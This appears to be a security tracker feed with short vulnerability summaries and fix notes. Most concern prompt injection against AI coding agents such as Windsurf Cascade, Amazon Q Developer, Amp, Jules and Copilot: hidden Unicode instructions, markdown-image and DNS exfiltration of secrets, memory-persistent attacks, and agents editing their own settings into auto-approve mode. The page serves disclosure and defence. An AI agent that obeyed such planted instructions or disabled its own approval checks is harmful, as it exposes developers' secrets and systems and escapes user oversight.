All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
Windsurf Cascade contains a create_memory tool that could enable SpAIware attacks, which are exploits allowing memory-persistent data exfiltration (stealing data by storing it in an AI's long-term memory). The key question is whether creating these memories requires human approval or happens automatically, which could determine how easily an attacker could abuse this feature.
Roo Code is an AI tool that automatically writes code inside text editors, but versions before 3.25.5 have a bug in how they parse commands (the instructions telling a computer what to do). An attacker could trick the AI into running extra harmful commands by hiding them in prompts if the user had enabled auto-approved command execution, a risky setting that is off by default.
CVE-2025-48956 is a Denial of Service vulnerability (a type of attack that makes a service unavailable) in vLLM, an inference and serving engine for large language models. Versions 0.1.0 through 0.10.1.0 are vulnerable to crashing when someone sends an HTTP GET request with an extremely large header, which exhausts the server's memory. This attack requires no authentication, so anyone on the internet can trigger it.
claude-code-router is a tool that directs Claude Code requests to different AI models. The software has a security flaw in its CORS (Cross-Origin Resource Sharing, which controls what websites can access a service) configuration that could allow attackers to steal user API keys (credentials that grant access to services) and sensitive data from untrusted websites.
Windsurf, a code editor based on VS Code with an AI coding agent called Windsurf Cascade, has security vulnerabilities that allow attackers to use prompt injection (tricking an AI by hiding instructions in its input) to steal developer secrets from a user's machine. The vulnerabilities were responsibly reported to Windsurf on May 30, 2025, but the company has not provided updates on fixes despite follow-up inquiries.
Amazon Q Developer for VS Code, a coding tool used by over 1 million people, has a vulnerability where attackers can use invisible Unicode characters (special characters that humans cannot see but the AI can read) to trick the AI into following hidden instructions, potentially stealing sensitive information or running malicious code on a user's computer.
Amazon Q Developer, a popular VS Code extension for coding assistance with over 1 million downloads, is vulnerable to indirect prompt injection (tricking an AI by hiding malicious instructions in its input data). This vulnerability allows an attacker or the AI itself to run arbitrary commands on a developer's computer without permission, similar to a flaw that Microsoft patched in GitHub Copilot.
A vulnerability in the Linux kernel's AMD SEV-SNP (Secure Encrypted Virtualization with Secure Nested Paging, a feature that isolates virtual machine memory) could allow cache coherency issues when memory is marked as private. The fix involves touching the first and last byte of each 4K page (a memory unit) during validation when a specific CPU flag indicates the vulnerability exists.
Volcengine's verl 3.0.0 has a deserialization vulnerability (unsafe loading of data structures from untrusted files) in its model_merger.py script that uses torch.load() with weights_only=False, allowing attackers to execute arbitrary code (run commands without authorization) if a victim loads a malicious model file. An attacker can exploit this by tricking a user into downloading and using a specially crafted .pt file, potentially gaining full control of the victim's system.
Amazon Q Developer, a popular VS Code coding agent with over 1 million downloads, has a high-severity vulnerability where it can leak sensitive information like API keys to external servers through DNS requests (the system that translates website names into IP addresses). Attackers can exploit this behavior using prompt injection (tricking the AI by hiding malicious instructions in its input), especially through untrusted data, because the security relies heavily on how the AI model behaves.
A vulnerability in Amp Code from Sourcegraph allowed attackers to steal sensitive information by using prompt injection (tricking an AI by hiding instructions in its input) through markdown image rendering, which could force the AI to send previous chat data to attacker-controlled websites. This type of vulnerability is common in AI applications and similar to one previously found in GitHub Copilot. The vulnerability has been fixed in Amp Code.
Claude Code is a tool that lets AI assistants write and run code on your computer. Before version 1.0.4, attackers could trick the tool into reading files and sending their contents over the internet without asking you first, because the tool had a list of allowed commands that was too broad. Exploiting this attack requires the attacker to insert malicious instructions into the conversation with Claude Code.
NVIDIA Merlin Transformers4Rec contains a vulnerability in one of its Python dependencies that allows attackers to inject malicious code (code injection, where an attacker inserts unauthorized commands into a program). A successful attack could lead to code execution (running unauthorized commands on a system), privilege escalation (gaining higher-level access rights), information disclosure (exposing sensitive data), and data tampering (unauthorized modification of data).
GitHub Copilot and VS Code are vulnerable to prompt injection (tricking an AI by hiding instructions in its input) that allows an attacker to achieve RCE (remote code execution, where an attacker can run commands on a system they don't own) by modifying a project's settings.json file to put Copilot into 'YOLO mode'. This vulnerability demonstrates a broader security risk: if an AI agent can write to files and modify its own configuration or security settings, it can be exploited for full system compromise.
Fix: Update to version 3.25.5, where the issue is fixed.
NVD/CVE DatabaseFix: This vulnerability is fixed in vLLM version 0.10.1.1. Users should upgrade to this version or later.
NVD/CVE DatabaseFix: The issue has been patched in v1.0.34.
NVD/CVE DatabaseFix: Implement a cache line eviction mitigation by touching the first and last byte of each 4K page being validated when changing page state to private. The mitigation should be invoked when validating memory and when the COHERENCY_SFW_NO CPUID bit (a CPU feature flag) is not set, indicating the SNP guest is vulnerable. No mitigation is needed when performing a page state change to shared and rescinding validation.
NVD/CVE DatabaseSourcegraph's Amp coding agent was vulnerable to invisible prompt injection (hidden instructions embedded in text that AI models interpret as commands). Attackers could use invisible Unicode Tag characters to trick the AI into dumping environment variables and exfiltrating secrets through URLs. The vulnerability has been fixed in the latest version.
Fix: According to the source, Sourcegraph addressed the vulnerability by "sanitizing the input." The source also recommends that developers: strip or neutralize Unicode Tag characters before processing input, add visual and technical safeguards against invisible prompts, include automated detection of suspicious Unicode usage in prompt injection monitors, implement human-in-the-loop approval before navigating to untrusted third-party domains, and mitigate downstream data exfiltration vulnerabilities.
Embrace The RedFix: Update to version 1.0.4 or later. The source states: 'Users on standard Claude Code auto-update received this fix automatically after release' and 'versions prior to 1.0.24 are deprecated and have been forced to update.'
NVD/CVE DatabaseThis content discusses security challenges in agentic AI systems (AI agents that can take actions autonomously), highlighting that generic jailbreak testing (attempts to trick AI into bypassing safety rules) misses real risks like tool misuse and data theft. The article emphasizes the need for contextual red teaming (security testing that simulates realistic attacks in specific business contexts) to properly protect AI agents in enterprise environments.
Google's Gemini AI models, including the Jules product, are vulnerable to invisible prompt injection (tricking an AI by hiding instructions in its input using invisible Unicode characters that the AI interprets as commands). This vulnerability was reported to Google over a year ago but remains unfixed at the model and API (application programming interface, the interface developers use to access the AI) level, affecting all applications built on Gemini, including Google's own products.
Jules, a coding agent, is vulnerable to prompt injection (tricking an AI by hiding malicious instructions in its input) attacks that can lead to remote command and control compromise. An attacker can embed malicious instructions in GitHub issues to trick Jules into downloading and executing malware, giving attackers full control of the system. The attack works because Jules has unrestricted internet access and automatically approves plans after a time delay without requiring human confirmation.
Fix: The source explicitly recommends four mitigations: (1) 'Be careful when directly tasking Jules to work with untrusted data (e.g. GitHub issues that are not from trusted sources, or websites with documentation that does not belong to the organization, etc.)'; (2) 'do not have Jules work on private, important, source code or give it access to production-level secrets, or anything that could enable an adversary to perform lateral movement'; (3) deploy 'monitoring and detection tools on these systems' to 'enable security teams to monitor and understand potentially malicious behavior'; and (4) 'do not allow arbitrary Internet access by default. Instead, allow the configuration to be enabled when needed.'
Embrace The RedGoogle Jules, an asynchronous coding agent (a tool that automatically writes and manages code tasks), has multiple security vulnerabilities that allow attackers to steal data through prompt injection (tricking the AI by hiding malicious instructions in its input). Attackers can exploit two main exfiltration vectors: using markdown image rendering to leak information to external servers, and abusing the view_text_website tool (which fetches and reads web pages) to read files and send them to attacker-controlled servers, often by planting malicious instructions in GitHub issues.
N/A -- This content is a navigation menu and feature listing from GitHub's Release 4.9.1 page, not a description of a security issue, vulnerability, or AI/LLM problem.